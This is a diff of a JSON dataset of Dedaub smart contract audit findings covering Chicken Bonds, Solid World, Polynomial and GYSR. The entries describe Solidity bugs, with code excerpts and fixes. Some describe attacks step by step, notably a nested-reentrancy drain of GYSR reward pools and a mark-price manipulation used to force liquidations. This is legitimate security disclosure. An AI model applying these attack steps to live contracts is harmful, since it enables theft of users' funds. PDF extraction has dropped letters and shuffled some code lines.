ChickenBondManager is itself very decentralized. (BAMM) Owners can set the gemSeller address. This is a centralization threat because gemSeller has innite approval for gem, in this case LQTY. However, this means that a malicious owner can only steal rewards, not principal. Furthermore, the gemSellerController makes use of a time lock system. This prevents the owner from immediately changing the address of the gemSeller. A new address will rst be stored as pending, and can only be set as the new gemSeller after a xed time period has elapsed. Once set, the gemSeller has maximum approval for all LQTY held in the B.AMM. (BAMM and gemSeller) Owners can set parameters, including fee and A. The fee parameter is a threat, but is bounded by a maximum value (1% in BAMM, 10% in gemSeller). The A parameter only aects the discount given to buyers, which is bounded by a maximum, limiting the eect of any changes. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Liquid Staking Delta", + "B.Protocol - Chicken Bonds", + "Severity: Medium" + ] + }, + { + "title": "in BAMM::constructor parameter ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", + "body": " RESOLVED Parameter address _fronEndTag should be address _frontEndTag.", + "labels": [ + "Dedaub", + "B.Protocol - Chicken Bonds", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", - "body": "function name in ILidoUnbond RESOLVED ILidoUnbond contains a function setIsRedeemEnabled, while the method in LidoUnbond is called setIsRedeemDisabled. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", + "body": "function names when converting LUSD RESOLVED The functions gemSeller::gemToLUSD and gemSeller::LUSDToGem convert the given quantity of gem tokens to their LUSD value and vice versa. However, the functions both return the USD price of the gem asset, not the LUSD price (more accurately, the GEM-ETH and ETH-USD prices are used together). Although the protocol assumes that 1 LUSD is always equivalent to 1 USD, gemSeller::gemToUSD and gemSeller::USDToGem would be more accurate function names. A3 Compiler bugs INFO The code is compiled with Solidity 0.6.11. This version of the compiler has some known bugs, which we do not believe to aect the correctness of the contracts. 01", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Liquid Staking Delta", + "B.Protocol - Chicken Bonds", "Severity: Informational" ] }, { - "title": "out of gas situation in RewardDistributor and DecollateralisationManager contract ", - "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", - "body": " DISMISSED The RewardsDistributor::getAllUnclaimedRewardAmountsForUserAndAsset() function performs a nested loop that iterates over all possible rewards for all amounts staked by a given user. Since both of these amounts are potentially unbounded, an out of gas error may eventually occur. //RewardsDistributor.sol::getAllUnclaimedRewardAmountsForUserAndAsset function getAllUnclaimedRewardAmountsForUserAndAssets( address[] calldata assets, address user external view override returns (address[] memory rewardsList, uint[] memory unclaimedAmounts) RewardsDataTypes.AssetStakedAmounts[] memory assetStakedAmounts = _getAssetStakedAmounts(assets,user); rewardsList = new address[](_rewardsList.length); unclaimedAmounts = new uint[](rewardsList.length); ) { for (uint i; i < assetStakedAmounts.length; i++) { for (uint r; r < rewardsList.length; r++) { rewardsList[r] = _rewardsList[r]; unclaimedAmounts[r] += _assetData[assetStakedAmounts[i].asset] .rewardDistribution[rewardsList[r]] .userReward[user] .accrued; if (assetStakedAmounts[i].userStake == 0) { continue; } unclaimedAmounts[r] += _computePendingRewardAmountForUser( user, rewardsList[r], assetStakedAmounts[i] ); } } return (rewardsList, unclaimedAmounts); } Similarly, the function getBatchesDecollateralisationInfo() of the contract DecollateralisationManager loops over all batchIds, the number of which could be unbounded. As already mentioned, this might eventually lead to an out of gas failure. //DecollateralisationManger.sol::getBatchesDecollateralisationInfo() function getBatchesDecollateralizationInfo( SolidWorldManagerStorage.Storage storage _storage, uint projectId, uint vintage external view returns (DomainDataTypes.TokenDecollateralizationInfo[] memory result) ) { DomainDataTypes.TokenDecollateralizationInfo[] memory allInfos = new DomainDataTypes.TokenDecollateralizationInfo[]( _storage.batchIds.length ); uint infoCount; for (uint i; i < _storage.batchIds.length; i++) { uint batchId = _storage.batchIds[i]; if ( _storage.batches[batchId].vintage != vintage || _storage.batches[batchId].projectId != projectId ) { continue; } (uint amountOut, uint minAmountIn, uint minCbtDaoCut) = _simulateDecollateralization( _storage, batchId, DECOLLATERALIZATION_SIMULATION_INPUT ); // Dedaub: part of the code is omitted for brevity infoCount = infoCount + 1; } result = new DomainDataTypes.TokenDecollateralizationInfo[](infoCount); for (uint i; i < infoCount; i++) { result[i] = allInfos[i]; } } This issue was discussed with the Solid World team, who estimated that the protocol will not use enough reward tokens, stakes or batchIds to cause it to run out of gas. 7 LOW SEVERITY: ID Descriptio ", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - May '23.pdf", + "body": "Stake event does not capture the msg.sender WONT FIX The SolidStaking Stake event captures the recipient account but not the msg.sender, thus this piece of information is not recorded if the recipient is not also the msg.sender. A2 LiquidityDeployer::getTokenDepositors can be optimized to save gas WONT FIX The function LiquidityDeployer::getTokenDepositors copies the depositors array from storage to memory by performing a loop over each element of the array instead of just returning the array. LiquidityDeployer::getTokenDepositors function getTokenDepositors() external view returns (address[] memory tokenDepositors) { } tokenDepositors = new address[](depositors.tokenDepositors.length); for (uint i; i < depositors.tokenDepositors.length; i++) { tokenDepositors[i] = depositors.tokenDepositors[i]; } By changing the code to: function getTokenDepositors() external view returns (address[] memory tokenDepositors) { } return depositors.tokenDepositors; the cost of calling getTokenDepositors is reduced by 33% and the deployment cost of the LiquidityDeployer is reduced by ~1.5%.", "labels": [ "Dedaub", "Solid World", - "Severity: Medium" + "Severity: Informational" + ] + }, + { + "title": "validity of the index price, the funding rate and the mark price is not always checked by the calle ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price that could be invalid in some cases. Nevertheless, the aforementioned functions do not revert in case the base asset price is invalid but return a tuple with the derived value and a boolean that denotes the derived value is invalid due to the base asset price being invalid. The callers of the functions are responsible for checking the validity of the returned values, a design which is valid and flexible as long as it is appropriately implemented. However, the function Exchange::_updateFundingRate does not check the validity of the funding rate value returned by getFundingRate, which could lead to an invalid funding rate geing registered, messing up the protocols operation. At the same time ShortCollateral::liquidate does not check the validity of the mark price returned by Exchanges getMarkPrice. The chance that something will go wrong is signicantly smaller with liquidate because each call to it is preceded by a call to the function maxLiquidatableDebt that checks the validity of the mark price.", + "labels": [ + "Dedaub", + "Polynomial Power Perp Contracts", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", - "body": "use of the override modier in several contracts RESOLVED In several contracts (most of which have been forked from Aave), many functions are marked with the override modier when no such function is actually inherited by the parent contract. These are probably leftovers from the time (prior to Solidity 0.8.8) when the override keyword was mandatory when a contract was implementing a function from a parent interface EmissionManager congureAssets setRewardOracle setDistributionEnd setEmissionPerSecond updateCarbonRewardDistribution setClaimer setRewardsVault setEmissionManager setSolidStaking setEmissionAdmin setCarbonRewardsManager getRewardsController getEmissionAdmin getCarbonRewardsManager RewardsController getRewardsVault 1 getClaimer getRewardOracle congureAssets setRewardOracle setClaimer setRewardsVault setSolidStaking handleUserStakeChange claimAllRewards claimAllRewardsOnBehalf claimAllRewardsToSelf RewardsDistributor getRewardDistributor getDistributionEnd getRewardsByAsset getAllRewards getUserIndex getAccruedRewardAmountForUser getUnclaimedRewardAmountForUserAndAssets setDistributionEnd setEmissionPerSecond updateCarbonRewardDistribution SolidStaking addToken stake withdraw withdrawStakeAndClaimRewards balanceOf totalStaked getTokensDistributor::getAllUnclaimedReward Resolved in commit 1ad958b6f0d74507c038bd49da281a572e170907. 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "LP token price might be incorrect OPEN LiquidityPool::getTokenPrice, the function that computes the price of one LP token, might return an incorrect price under certain circumstances. Specically, it is incorrectly assumed that if the skew is equal to 0 the totalMargin and usedFunds will always add up to 0. LiquidityPool::getTokenPrice() function getTokenPrice() public view override returns (uint256) { if (totalFunds == 0) { return 1e18; } uint256 totalSupply = liquidityToken.totalSupply() + totalQueuedWithdrawals; int256 skew = _getSkew(); if (skew == 0) { // Dedaub: Incorrect assumption that if skew == 0 then // return totalFunds.divWadDown(totalSupply); totalMargin + usedFunds == 0 } (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 totalValue = totalFunds; uint256 amountOwed = markPrice.mulWadDown(powerPerp.totalSupply()); uint256 amountToCollect = markPrice.mulWadDown(shortToken.totalShorts()); uint256 totalMargin = _getTotalMargin(); totalValue += totalMargin + amountToCollect; totalValue -= uint256((int256(amountOwed) + usedFunds)); return totalValue.divWadDown(totalSupply); The accounting of LiquidityPools queued orders is OPEN incorrect }", "labels": [ "Dedaub", - "Solid World", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", - "body": "events could incorporate additional information INFO Creation events, CategoryCreated, ProjectCreated, BatchCreated, could include more information related to the category, project or batch associated with them.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "does not set the queuedPerpSize storage variable to 0 when an order of size sizeDelta + queuedPerpSize is submied to the Synthetix Perpetual Market. Also, queuedPerpSize should also be accounted for in the SubmitDelayedOrder emied event. LiquidityPool::_placeDelayedOrder() function _placeDelayedOrder( int256 sizeDelta, bool isLiquidation ) internal { PerpsV2MarketBaseTypes.DelayedOrder memory order = perpMarket.delayedOrders(address(this)); (,,,,, IPerpsV2MarketBaseTypes.Status status) = perpMarket.postTradeDetails(sizeDelta, 0, IPerpsV2MarketBaseTypes.OrderType.Delayed, address(this)); int256 oldSize = order.sizeDelta; if (oldSize != 0 || isLiquidation || uint8(status) != 0) { queuedPerpSize += sizeDelta; return; } perpMarket.submitOffchainDelayedOrderWithTracking( sizeDelta + queuedPerpSize, perpPriceImpactDelta, synthetixTrackingCode ); // Dedaub: queuedPerpSize should be set to 0 // Dedaub: Below line should be: // emit SubmitDelayedOrder(sizeDelta); emit SubmitDelayedOrder(sizeDelta + queuedPerpSize); }", "labels": [ "Dedaub", - "Solid World", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", - "body": "related gas optimization RESOLVED The elds of DomainDataTypes::Category struct can be reordered to be tighter packed in 4 instead of 5 storage slots. // DomainDataTypes.sol::Category struct Category { uint volumeCoefficient; uint40 decayPerSecond; uint16 maxDepreciation; uint24 averageTA; uint totalCollateralized; uint32 lastCollateralizationTimestamp; uint lastCollateralizationMomentum; } // Dedaub: tighter packed version struct Category { uint volumeCoefficient; uint40 decayPerSecond; uint16 maxDepreciation; uint24 averageTA; uint32 lastCollateralizationTimestamp; uint totalCollateralized; uint lastCollateralizationMomentum; } We measured that in certain test cases the use of less SLOAD and STORE instructions reduced the gas consumption by around 1.5-2% and did not cause any regression in 1 terms of gas consumption (and of course correctness). Resolved in commit b3e79c2456ecca913be0165fd49992eba8e6e1. A4 Compiler version and possible bugs RESOLVED The code is compiled with the floating pragma ^0.8.16. It is recommended that the pragma is xed to a specic version. Versions ^0.8.16 of Solidity in particular, have some known bugs, which we do not believe aect the correctness of the contracts. Resolved in commit d68cfaf512d5eb8da646780350713d6c98ad7da2. 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "mark price is susceptible to manipulation OPEN The mark price depends on the total sizes of the long and short positions. ShortCollateraltoken::canLiquidate and maxLiquidatableDebt use the mark price to compute the value of the position and to check if the collateralization ratio is above the liquidation limit or not. An adversary could open a large short position to increase the mark price and therefore decrease the collateral ratio of all the positions and possibly make some of them undercollateralized. The adversary would then proceed by calling Exchanges liquidate function to liquidate the underwater position(s) and get the liquidation bonus before nally closing their short position.", "labels": [ "Dedaub", - "Solid World", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: High" ] }, { - "title": "shares can be drained by the controller devalued via a reentrancy aack ", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": " RESOLVED This vulnerability arises from two separate issues in dierent parts of the code: 1. The TokenUtils::receiveAmount/receiveWithFee functions compute the amount of received tokens as the dierence in balance before and after the transfer. TokenUtils::receiveAmount() function receiveAmount( IERC20 token, uint256 shares, address sender, uint256 amount ) internal returns (uint256) { // transfer uint256 total = token.balanceOf(address(this)); token.safeTransferFrom(sender, address(this), amount); uint256 actual = token.balanceOf(address(this)) - total; // mint shares at current rate uint256 minted = (total > 0) ? (shares * actual) / total : actual * INITIAL_SHARES_PER_TOKEN; require(minted > 0); return minted; } The goal is to support dierent types of tokens (e.g. tokens with transfer fees). This approach, however, introduces a possible aack vector: the code could miscalculate the amount of tokens transferred if some other action is executed in between the two balance readings. Note that token.safeTransferFrom() is an external call outside our control. As such, we cannot exclude the possibility that it returns execution to the adversary (e.g. via a transfer hook). 2. The fund() function, of all reward modules, has no reentrancy guards (likely due to the fact that funding sounds \"harmless\"; we send tokens to the contract without geing anything back). The possible aack: We assume a malicious controller that creates a pool with ERC20FixedRewardModule (for simplicity). His goal is to receive the benets of staking but without giving any rewards back. The reward token used in the pool is a legitimate trusted token. We only assume that it has some ERC777-type transfer hook (or any mechanism to notify the sender when a transferFrom happens). 1. The adversary funds the reward module and waits until several users have staked tokens (giving them rights to reward tokens). 2. He then initiates a number of k nested calls to ERC20FixedRewardModule::fund as follows: ERC20FixedRewardModule::fund() function fund(uint256 amount) external { require(amount > 0, \"xrm4\"); (address receiver, uint256 feeRate) = _config.getAddressUint96( keccak256(\"gysr.core.fixed.fund.fee\")); uint256 minted = _token.receiveWithFee( rewards, msg.sender, amount, receiver, feeRate ); rewards += minted; emit RewardsFunded(address(_token), amount, minted, block.timestamp); } a. He calls fund() with an innitesimal amount (say 1 wei). fund calls receiveWithFee which registers the initial total = balanceOf(this) and calls token.safeTransferFrom. TokenUtils::receiveWithFee() function receiveWithFee(...) internal returns (uint256) { uint256 total = token.balanceOf(address(this)); uint256 fee; if (feeReceiver != address(0) && feeRate > 0 && feeRate < 1e18) { fee = (amount * feeRate) / 1e18; token.safeTransferFrom(sender, feeReceiver, fee); } token.safeTransferFrom(sender, address(this), amount - fee); uint256 actual = token.balanceOf(address(this)) - total; uint256 minted = (total > 0) ? (shares * actual) / total : actual * INITIAL_SHARES_PER_TOKEN; require(minted > 0); return minted; } b. The laer passes control to the adversary (via a send hook), which makes a nested call to fund, again with amount = 1 wei. Which again leads to a new token.safeTransferFrom. c. The process continues until the k-th call, which is now made with a larger amount = N. The adversary stops making nested calls so the previous calls nish their execution starting from the most nested one. d. The last (k-th) call computes actual as the dierence between the two balances which will be equal to N tokens. This causes rewards to be incremented by the corresponding amount of shares (= (rewards * N) / total). e. Now execution returns to the (k-1)-th call, for which the actual transferred amount was just 1 wei. However, the dierence of balances includes the nested k-th call, so actual will be found to be N (not 1 wei), causing rewards to be incremented again by the same amount of shares. f. The same happens with all outer calls, causing rewards to be incremented by k times more shares than they should! 3. The previous step essentially devalued each reward share, since we printed k times more shares than we should have. Note that the controller can withdraw all funds except those corresponding to the shares in debt. But these now are worth less, so the adversary can withdraw more reward tokens than he should. By picking k to be as large as the stack allows, and a large value of N (possibly using a flash loan), the controller can drain almost all reward tokens from the pool, leaving users with no rewards. Note that the other reward modules are also likely vulnerable since they all call receiveWithFee and have no reentrancy guard. To prevent this vulnerability reentrancy guards should be added to all fund methods. Moreover, TokenUtils::receiveAmount could check that the actual transferred amount is no larger than the expected one. This check would still support tokens with transfer fees, but would catch aacks like the one reported here. Resolution: This vulnerability was xed by addressing both issues that enabled it. Specically: A check was added in TokenUtils::receiveAmount to ensure that the transferred amount is no larger than the expected one Reentrancy guards were added to the fund function HIGH SEVERITY: [No high severity issues] MEDIUM SEVERITY: ", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "of usedFunds and totalFunds is incorrect OPEN The LiquidityPool contract uses two storage variables to track its available balance, usedFunds and totalFunds. As one would expect, these two variables get updated when a position is open or closed, i.e., when functions openLong, openShort, closeLong and closeShort are called. Incoming (openLong and closeShort) and outgoing (openShort and closeLong) funds for the position must be considered together with funds needed for fees. There are 3 types of fees, trading fees aributed to the LiquidityPool, fees required to open an oseing position in the Synthetix Perp Market, which are called hedgingFees, and a protocol fee, externalFee. The accounting of all these values is rather complex and ends up being incorrect in all the four aforementioned functions. Lets take the closeLong function as an example. In closeLong there are no incoming funds and the outgoing funds are the sum of the totalCost, the externalFee and the hedgingFees. However, the usedFunds are actually increased by tradeCost or totalCost+tradingFee+externalFee+hedgingFees, while hedgingFees are also added to usedFunds in the _hedge function. Thus, there are two issues: (1) hedgingFees are accounted for twice and (2) tradingFee is added when it should not. LiquidityPool::closeLong() function closeLong(uint256 amount, address user, bytes32 referralCode) external override onlyExchange nonReentrant returns (uint256 totalCost) { } (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 tradeCost = amount.mulWadDown(markPrice); uint256 fees = orderFee(-int256(amount)); totalCost = tradeCost - fees; SUSD.safeTransfer(user, totalCost); uint256 hedgingFees = _hedge(-int256(amount), false); uint256 feesCollected = fees - hedgingFees; uint256 externalFee = feesCollected.mulWadDown(devFee); SUSD.safeTransfer(feeReceipient, externalFee); tradeCost = totalCost + fees fees = feesCollected + hedgingFees and feesCollected = tradingFee + externalFee // Dedaub: usedFunds is incremented by tradeCost // // // usedFunds += int256(tradeCost); emit RegisterTrade(referralCode, feesCollected, externalFee); emit CloseLong(markPrice, amount, fees); The functions openLong, openShort and closeShort suer from similar issues. H6 There might not be enough incentives for liquidators to OPEN liquidate unhealthy positions Collateralized short positions opened via the Exchange can get liquidated. For a liquidatable position of size N the liquidator has to give up N PowerPerp tokens for an amount of short collateral tokens equaling the value of the position plus a liquidation bonus. Thus, a user/liquidator is incentivized to liquidate a losing position instead of just closing their position, as they will get a liquidation bonus on top of what they would get. However, the liquidator might not always get paid an amount of short collateral tokens equaling the value of the position plus a liquidation bonus according to the following condition in function ShortCollateral::liquidate: ShortCollateral::liquidate() totalCollateralReturned = liqBonus + collateralClaim; if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; As can be seen, if the value of the position plus the liquidation bonus, or totalCollateralReturned, is greater than the positions collateral, the liquidator gets just the positions collateral. This means that if during a signicant price increase liquidations do not happen fast enough, certain losing positions will not be liquidatable for a prot, as the collaterals value will be less than that of the long position that needs to be closed. However, such a market is not healthy and this is reflected in the mark price, which lies in the center of the protocol. To avoid such scenarios (1) the collateralization ratios need to be chosen carefully while taking into account the squared nature of the perps and (2) an emergency fund should be implemented, which will be able to chip in when a position's collateral is not enough to incentivize its liquidation. 9 MEDIUM SEVERITY: ", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Critical" + "Polynomial Power Perp Contracts", + "Severity: High" ] }, { - "title": "use of the factory contracts is only enforced o-chain WONT FIX The proper way to deploy a pool and its modules is via the factory contracts. These contracts ensure that the pool is initialized with proper values that prevent a potentially malicious controller from stealing the investors funds. However, the use of factory contracts is only checked o-chain. PoolFactory keeps a list of contracts it created, and this list presumably is used by the GYSR UI to allow users to interact only with oicially created contracts. On the other hand, anyone could still create their own Pool contracts and manually initialize in any way. Such contracts would have identical source code as the legitimate ones, and it would be hard to recognize them. They would also be clearly unsafe: by using malicious staking and reward modules, or even a fake GYSR token, an adversary could easily steal all the funds deposited by investors. Although the o-chain checks would ensure that no user actually interacts with such contracts, such checks are inherently less reliable than on-chain ones. It would be preferable to ensure that contracts with bytecode identical to the oicial ones can never be improperly initialized, for instance by allowing their constructor to be called by a factory contract. Resolution: This issue largely concerns o-chain aspects and cannot be fully addressed on-chain. As a consequence, it will be addressed by adding clear documentation explaining how to verify the validity of a deployed contract. Unstaking in ERC20FixedRewardModule is inconsistent RESOLVED under dierent use cases M2 The ERC20FixedRewardModule was updated as part of the PR #38 mentioned in the ABSTRACT section. The fundamental functions for the users are stake, unstake and claim. When a user stakes, the pos.debt eld holds their potential rewards if they stake for the entire predened period. However, a user can always claim their rewards for the amount already vested. Here are two scenarios of the same logic that are treated dierently: Case #1: The rst case assumes that the users will not stake more than once. This happens when this reward module is combined with the ERC20BondStaking module since users cant stake twice with a bond. However, if they unstake early, for recovering the remaining principal, their rewards earning ratio should also be reduced. In order for the reward module to achieve this, it treats the user shares as if they were vesting all together. So, when user unstakes early only a percentage of all user shares have vested resulting in losing portion of the earning power as indented. Case #2: The second case is when users can stake more than once. This can happen when this module is combined with other staking modules like ERC20StakingModule for example. Then, when a user stakes again, the function calculates the rewards earned up to that point, updates their records and rolls over the remaining (unvested) amount with the newly added one to start vesting from that point forward. This approach treats the user shares as if they were vesting linearly and not all together which means that the user wont lose his earning power. A detailed example illustrating the inconsistency between the 2 cases is provided in the APPENDIX of this report. 1 Resolution: This issue was addressed by modifying the staking logic to remove the inconsistency. LOW SEVERITY: ID Description ", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": " L1 Approximation errors in ERC20BondStakingModule RESOLVED ERC20BondStakingModule needs to perform vesting and debt decay on multiple amounts which however have dierent vesting/decay periods. To perform this operation in O(1) an approximation method is used, where vesting/decay happens for the whole amount simultaneously, and the period is essentially restarted in every update. This method necessarily introduces an approximation error. If multiple updates happen the resulting values could be substantially lower than the actual ones. What is particularly problematic is that such delays can be produced by events that do not add new value to the system. For instance, vesting a large amount could be substantially delayed by staking (maliciously or coincidentally) small amounts. With just 5 updates the amount vested at the end of the period will be only 67% of the total. Note that there is also an \"opposite extreme\" strategy: instead of restarting the period on every update, we could choose to never restart until the current amount is fully vested. Of course, this method also introduces an error. If the newly deposited amounts are large, delaying them might introduce a larger error than restarting the period. So we propose to follow a hybrid approach, alternating between the two extremes: keep a pending amount whose vesting has not started yet, and will start no later than 1 at the end of the current period, but possibly earlier if it's preferable. When a new amount arrives, we will compute how much error will be introduced by starting a new vesting period, and how much error will be introduced if we delay the new amount, and we'll choose the approach of the smallest error. This report is accompanied by a Jupyter notebook with a discussion of this method, a prototype implementation and some simulations. The proposed method has the following properties: It needs O(1) time and is only marginally more complicated than the simple method. It is guaranteed to vest at least as much as the simple method, and never more than the maximum amount. In order to introduce vesting delays one needs to add new funds to the system, larger than the ones currently being vested. Resolution: This issue was addressed by an improved logic that resets the time period only on stake operations, improving the accuracy while simplifying the code. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", + "title": "are not able to set a minimum amount of collateral that they expect from a liquidatio ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " OPEN Function Exchange::_liquidate does not require that totalCollateralReturned, i.e., the collateral awarded to the liquidator, is greater than a liquidator-specied minimum, thus in certain cases the liquidator might get back less than what they expected (as mentioned in issue H6). This might happen because the collateral of the position is not enough to cover the liquidations theoretical collateral claim (bad debt scenario) plus the liquidation bonus. As can be seen in the below snippet of the ShortCollaterals liquidate function, the totalCollateralReturned will be at most equal to the collateral of the specic position. ShortCollateral::liquidate() function liquidate(uint256 positionId, uint256 debt, address user) external override onlyExchange nonReentrant returns (uint256 totalCollateralReturned) // Dedaub: Code omitted for brevity uint256 collateralClaim = debt.mulDivDown(markPrice, collateralPrice); uint256 liqBonus = collateralClaim.mulWadDown(coll.liqBonus); totalCollateralReturned = liqBonus + collateralClaim; // Dedaub: This if statement can reduce totalCollateralReturned to // if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; something smaller than expected by the liquidator { 1 userCollateral.amount -= totalCollateralReturned; // Dedaub: Code omitted for brevity }", "labels": [ "Dedaub", - "GYSR - Mar '23", + "Polynomial Power Perp Contracts", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": "is not correctly overridden in ERC20BondStakingModule RESOLVED The ERC20BondStakingModule contract overrides the ERC721::_beforeTokenTransfer() hook. However, the overridden hook hasnt the same signature as the original one causing the compilation to fail. The missing part is the 4th argument which should have been another uint256. ERC721::_beforeTokenTransfer() function _beforeTokenTransfer( address from, address to, uint256, /* firstTokenId */ uint256 batchSize ) internal virtual { if (batchSize > 1) { if (from != address(0)) { _balances[from] -= batchSize; } if (to != address(0)) { _balances[to] += batchSize; } } } ERC20BondStakingModule::_beforeTokenTransfer() function _beforeTokenTransfer( address from, address to, uint256 tokenId ) internal override { if (from != address(0)) _remove(from, tokenId); if (to != address(0)) _append(to, tokenId); } 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "funds are not optimally managed OPEN Function KangarooVault::_clearPendingOpenOrders determines if the previous open order has been successfully executed or has been canceled. In case the order has been canceled, the opposite exchange order is closed and the KangarooVault position data are adjusted to how they were before opening the order. However, the margin transferred to the Synthetix Perpetual Market, which was required for the position, is not revoked, meaning that the KangarooVault funds are not optimally managed. At the same time, when a pending close orders execution is conrmed in the function _clearPendingCloseOrders, the margin deposited to the Synthetix Perpetual Market is not reduced accordingly except when positionData.shortAmount == 0. The KangarooVault funds could also be suboptimally managed because the function KangarooVault::_openPosition does not take into account the already available margin when calculating the margin needed for a new open order. If the already opened position has available margin the KangarooVault could use part of that for its new order and transfer less than what would be needed if there was no margin available.", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": "tests RESOLVED There are some cases in the test scripts that fail due to the grammar changes that OZ introduced at commit fbf235661e01e27275302302b86271a8ec136fea. They updated the revert messages of the approve(), transferFrom() and safeTransferFrom() functions from: ERC721: caller is not token owner nor approved to: ERC721: caller is not token owner or approved However, the tests haven't been updated to reflect the new changes, so they fail. The aected tests are the following: aquarium.js LoC:113 - when token transfer has not been approved erc20bondstakingmodule.js LoC: 1680 - when user transfers a bond position they do not own LoC: 1689 - when user safe transfers a bond position they do not own LoC: 1699 - when user transfers a bond position that they already transferred", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "and KangarooVault could be susceptible OPEN to bank runs The LiquidityPool and KangarooVault contracts could be susceptible to bank runs. As these two contracts can use up to their whole available balance, liquidity providers might rush to withdraw their deposits when they feel that they might not be able to withdraw for some time. At the same time, depositors would rush to withdraw if they 1 realized that the pools Synthetix position is in danger and their funds that have been deposited as margin could get lost. A buer of funds that are always available for withdrawal could increase the trust of liquidity providers to the system. Also, an emergency fund, which is built from fees and could help alleviate fund losses, could also help make the system more robust against bank run scenarios.", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": "gas optimization RESOLVED Since the protocol tries to minimize the gas consumption to the minimum possible, we suggest here a minor optimization in ERC20FixedRewardModule. The pos.updated value could be updated inside the if statement above instead of having to check again whether the period has ended or not. 1 ERC20FixedRewardModule::claim() function claim( bytes32 account, address, address receiver, uint256, bytes calldata ) external override onlyOwner returns (uint256, uint256) { ... if (block.timestamp > end) { e = d; } else { uint256 last = pos.updated; e = (d * (block.timestamp - last)) / (end - last); } ... // Dedaub: This update could be transferred to the above if statement // pos.updated = uint128(block.timestamp < end ? block.timestamp : end); ... for avoiding rechecking whether the period has ended }", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "users might be more vulnerable in a bank run OPEN In a bank run situation casual users of the LiquidityPool (i.e., users that interact with it through the web UI) might not be able to withdraw their funds. This is because the LiquidityPool oers dierent withdrawal functionality for dierent users. Power users (or protocols that integrate with the LiquidityPool) are expected to use the withdraw function, which oers immediate withdrawals for a small fee, while casual users that use the web UI will use the queueWithdraw function, which queues the withdrawal so it can be processed at a later time.", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": "comment in OwnerController RESOLVED The OwnerController contract provides functionality for the rest of the protocol contracts to manage their owners and their controllers. However, while the comments of the transferOwnership() function state that the owner can renounce ownership by transferring to address(0), this is not possible with the current code as it reverts when the newOwner address is 0. OwnerController::transferOwnership() /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * This can include renouncing ownership by transferring to the zero * address. Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual override { 1 requireOwner(); require(newOwner != address(0), \"oc3\"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } A5 Compiler bugs INFO The code is compiled with Solidity 0.8.18. Version 0.8.18, at the time of writing, has no known bugs. 1", 